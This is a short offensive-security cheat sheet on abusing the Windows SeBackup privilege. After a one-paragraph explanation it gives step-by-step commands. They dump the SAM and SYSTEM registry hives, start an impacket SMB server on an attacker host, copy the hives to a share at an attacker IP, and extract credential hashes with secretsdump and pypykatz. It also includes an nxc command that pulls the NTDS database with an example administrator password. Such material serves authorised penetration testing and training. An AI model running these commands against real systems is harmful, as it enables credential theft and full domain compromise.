SeBackup
A Windows privilege that allows bypassing standard ACL checks to read files and registry hives during backup operations. Assigned by default to Administrators, Backup Operators, and Server Operators but disabled in user tokens by default. Backup-aware tools (e.g., reg.exe, robocopy, ntbackup) explicitly enable this privilege at runtime to access protected objects regardless of ACLs.
Exploitation
Move to a writeable directory and copy the hives:
# Move to a writeable directory
cd c:\windows\temp
# Copy the SAM and SYSTEM hives
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\systemTransfer the hives to the attacking host (preferrable via SMB and not WinRM):
# Start an SMB server
sudo impacket-smbserver share -smb2support / -user test -password testConnect and copy the hives:
# Connect to the share
net use z: \\<attacker-IP>\share /user:test test
# Copy the hives
copy sam z:\
copy system z:\Dump the creds on the attacking host:
# Dump creds with impacket
impacket-secretsdump -sam sam -system system LOCAL
# Dump creds with pypykatz
pypykatz registry --sam sam systemIf the credentials of the Backup Operators's member are available:
nxc smb 192.168.210.16 -u administrator -p Password123! --ntds vssLast updated
Was this helpful?